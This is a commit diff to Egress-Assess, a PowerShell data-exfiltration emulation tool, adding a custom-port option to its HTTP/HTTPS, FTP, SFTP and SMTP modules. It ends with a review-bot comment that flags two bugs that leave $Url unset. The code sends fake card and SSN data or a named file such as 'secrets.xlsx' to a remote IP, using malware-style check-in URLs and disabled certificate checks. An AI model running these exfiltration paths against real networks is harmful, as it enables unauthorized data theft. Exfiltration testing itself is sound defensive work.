Added port in for most protocols and actor modules

master
Chris Truncer 2018-06-22 14:58:19 -06:00
parent 62ab4d30cd
commit b5f5986014
No known key found for this signature in database
GPG Key ID: 9715AC2B40A5A64A
1 changed files with 212 additions and 50 deletions


@ -57,9 +57,12 @@ function Invoke-EgressAssess
This switch reduces the time required to generate fake data. This switch reduces the time required to generate fake data.
Note: Fake CC and SSN data will be generated in batches of 500 sequential values. Note: Fake CC and SSN data will be generated in batches of 500 sequential values.
.Parameter Port
The port is if you wish to specify a non-standard port for data transfer(s)
.Example .Example
Import-Module Egress-Assess.ps1 Import-Module Egress-Assess.ps1
Invoke-EgressAssess -client http -ip 127.0.0.1 -Datatype cc -Size 50 -Loop 20 -Fast -Verbose Invoke-EgressAssess -client http -ip 127.0.0.1 -Datatype cc -Size 50 -Port 8080 -Loop 20 -Fast -Verbose
Invoke-EgressAssess -client ftp -ip 127.0.0.1 -Username user -Password pass -Datatype ssn -Size 10 -Verbose Invoke-EgressAssess -client ftp -ip 127.0.0.1 -Username user -Password pass -Datatype ssn -Size 10 -Verbose
Invoke-EgressAssess -client smb -ip 127.0.0.1 -Datatype "c:\Users\testuser\secrets.xlsx" -Verbose Invoke-EgressAssess -client smb -ip 127.0.0.1 -Datatype "c:\Users\testuser\secrets.xlsx" -Verbose
Invoke-EgressAssess -client icmp -ip 127.0.0.1 -Datatype ssn -Report -Verbose Invoke-EgressAssess -client icmp -ip 127.0.0.1 -Datatype ssn -Report -Verbose
@ -88,6 +91,8 @@ function Invoke-EgressAssess
[Parameter(Mandatory = $False)] [Parameter(Mandatory = $False)]
[string]$Password, [string]$Password,
[Parameter(Mandatory = $False)] [Parameter(Mandatory = $False)]
[int]$Port,
[Parameter(Mandatory = $False)]
[int]$Size = 1, [int]$Size = 1,
[Parameter(Mandatory = $False)] [Parameter(Mandatory = $False)]
[int]$Loops = 1, [int]$Loops = 1,
@ -145,34 +150,37 @@ function Invoke-EgressAssess
} }
else else
{ {
if ($client -eq "http") if(!$Port)
{ {
$port = 80 if ($client -eq "http")
} {
elseif ($client -eq "https") $port = 80
{ }
$port = 443 elseif ($client -eq "https")
} {
elseif ($client -eq "ftp") $port = 443
{ }
$port = 21 elseif ($client -eq "ftp")
} {
elseif ($client -eq "sftp") $port = 21
{ }
$port = 22 elseif ($client -eq "sftp")
} {
elseif ($client -eq "smtp") $port = 22
{ }
$port = 25 elseif ($client -eq "smtp")
} {
elseif ($client -eq "smb") $port = 25
{ }
$port = 445 elseif ($client -eq "smb")
} {
else $port = 445
{ }
Write-Verbose "[*] Protocol not available." else
throw "Error" {
Write-Verbose "[*] Protocol not available."
throw "Error"
}
} }
#attempt to test connection to TCP ports #attempt to test connection to TCP ports
@ -546,11 +554,26 @@ function Invoke-EgressAssess
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + "/major/images/view.php" if (!$Port)
{
$Url = "http://" + $IP + "/major/images/view.php"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/major/images/view.php"
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + "/major/images/view.php" if (!$Port)
{
$Url = "https://" + $IP + "/major/images/view.php"
}
else
{
$Url = "https://" + $IP + ":" + $Port + "/major/images/view.php"
}
} }
$ranHost = Get-Random -InputObject $checkinDomains $ranHost = Get-Random -InputObject $checkinDomains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -575,11 +598,27 @@ function Invoke-EgressAssess
# Checkin Request 2 # Checkin Request 2
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + "/major/txt/read.php" if(!$Port)
{
$Url = "http://" + $IP + "/major/txt/read.php"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/major/txt/read.php"
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + "/major/txt/read.php" if(!$Port)
{
$Url = "https://" + $IP + "/major/txt/read.php"
}
else
{
$Url = "https://" + $IP + ":" + $Port + "/major/txt/read.php"
}
} }
$ranHost = Get-Random -InputObject $checkinDomains $ranHost = Get-Random -InputObject $checkinDomains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -607,11 +646,27 @@ function Invoke-EgressAssess
$ranURI = Get-Random -InputObject $uris $ranURI = Get-Random -InputObject $uris
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + $ranURI if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + $ranURI if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
} }
$ranHost = Get-Random -InputObject $checkinDomains $ranHost = Get-Random -InputObject $checkinDomains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -693,11 +748,27 @@ function Invoke-EgressAssess
# Checkin Request # Checkin Request
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + "/home/index.asp?typeid=13" if (!$Port)
{
$Url = "http://" + $IP + "/home/index.asp?typeid=13"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/home/index.asp?typeid=13"
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + "/home/index.asp?typeid=13" if(!$Port)
{
$Url = "https://" + $IP + "/home/index.asp?typeid=13"
}
else
{
$Url = "https://" + $IP + ":" + $Port + "/home/index.asp?typeid=13"
}
} }
$ranHost = Get-Random -InputObject $domains $ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -723,11 +794,27 @@ function Invoke-EgressAssess
$ranURI = Get-Random -InputObject $uris $ranURI = Get-Random -InputObject $uris
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + $ranURI if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else {
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + $ranURI if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
} }
$ranHost = Get-Random -InputObject $domains $ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -989,11 +1076,27 @@ function Invoke-EgressAssess
$ranURI = Get-Random -InputObject $uris $ranURI = Get-Random -InputObject $uris
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + $ranURI if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + $ranURI if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
} }
$ranHost = Get-Random -InputObject $domains $ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -1100,11 +1203,27 @@ function Invoke-EgressAssess
$ranURI = Get-Random -InputObject $uris $ranURI = Get-Random -InputObject $uris
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + $ranURI if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + $ranURI if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
} }
$ranHost = Get-Random -InputObject $domains $ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -1233,11 +1352,27 @@ function Invoke-EgressAssess
} }
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + "/post_data.php" if (!$Port)
{
$Url = "http://" + $IP + "/post_data.php"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/post_data.php"
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + "/post_data.php" if (!$Port)
{
$Url = "https://" + $IP + "/post_data.php"
}
else
{
"https://" + $IP + ":" + $Port + "/post_data.php"
}
} }
} }
@ -1353,7 +1488,15 @@ function Invoke-EgressAssess
} }
if ($filetransfer -eq $True) if ($filetransfer -eq $True)
{ {
$Destination = "ftp://" + $IP + "/" + $Path if (!$Port)
{
$Destination = "ftp://" + $IP + "/" + $Path
}
else
{
$Destination = "ftp://" + $IP + ":" + $Port + "/" + $Path
}
$SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName }
$webclient = New-Object System.Net.WebClient $webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($username, $password) $webclient.Credentials = New-Object System.Net.NetworkCredential($username, $password)
@ -1376,7 +1519,16 @@ function Invoke-EgressAssess
{ {
$Date = Get-Date -Format Mdyyyy_hhmmss $Date = Get-Date -Format Mdyyyy_hhmmss
$Path = "ftpdata" + $Date + ".txt" $Path = "ftpdata" + $Date + ".txt"
$Destination = "ftp://" + $Username + ":" + $Password + "@" + $IP + "/" + $Path
if (!$Port)
{
$Destination = "ftp://" + $Username + ":" + $Password + "@" + $IP + "/" + $Path
}
else
{
$Destination = "ftp://" + $Username + ":" + $Password + "@" + $IP + ":" + $Port + "/" + $Path
}
$ftpClient = New-Object System.Net.WebClient $ftpClient = New-Object System.Net.WebClient
$uri = New-Object System.Uri($Destination) $uri = New-Object System.Uri($Destination)
@ -1482,10 +1634,15 @@ function Invoke-EgressAssess
Break Break
} }
} }
# Connect to Egress-Assess Server # Connect to Egress-Assess Server
if(!$Port)
{
$Port = 22
}
try try
{ {
$Con = New-Object Renci.SshNet.PasswordConnectionInfo($IP, $Username, $Password) $Con = New-Object Renci.SshNet.PasswordConnectionInfo($IP, $Port, $Username, $Password)
$sftpClient = New-Object Renci.SshNet.SftpClient($Con) $sftpClient = New-Object Renci.SshNet.SftpClient($Con)
$sftpClient.Connect() $sftpClient.Connect()
} }
@ -1582,13 +1739,18 @@ function Invoke-EgressAssess
{ {
Try Try
{ {
if (!$Port)
{
$Port = 25
}
if ($filetransfer -eq $true) if ($filetransfer -eq $true)
{ {
Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "EgressAssess With Attachment" -Attachments "$SourceFilePath" -SmtpServer $IP Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "EgressAssess With Attachment" -Attachments "$SourceFilePath" -SmtpServer $IP -Port $Port
} }
else else
{ {
Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "$SMTPData" -SmtpServer $IP Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "$SMTPData" -SmtpServer $IP -Port $Port
} }
} }
catch catch
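Review bot: The HTTPS custom-port branch in the `/post_data.php` hunk (@ -1233) drops the assignment: the new line is a bare `"https://" + $IP + ":" + $Port + "/post_data.php"`, so `$Url` is never set on that path and the string goes to the output stream instead. It should read `$Url = "https://" + $IP + ":" + $Port + "/post_data.php"`. In the @ -723 hunk the HTTP `else {` is followed by a second `{`, which PowerShell appears to treat as an unexecuted script-block literal, so `$Url` would stay unset there as well; drop the extra brace pair. `[int]$Port` is accepted without bounds, and a `[ValidateRange(1,65535)]` attribute on the parameter would reject values that cannot be a TCP port before they reach the URL strings, `PasswordConnectionInfo` or `Send-MailMessage`. Invoke-EgressAssess starts and ends outside every hunk shown, so how `$Url` is used afterwards is not visible here.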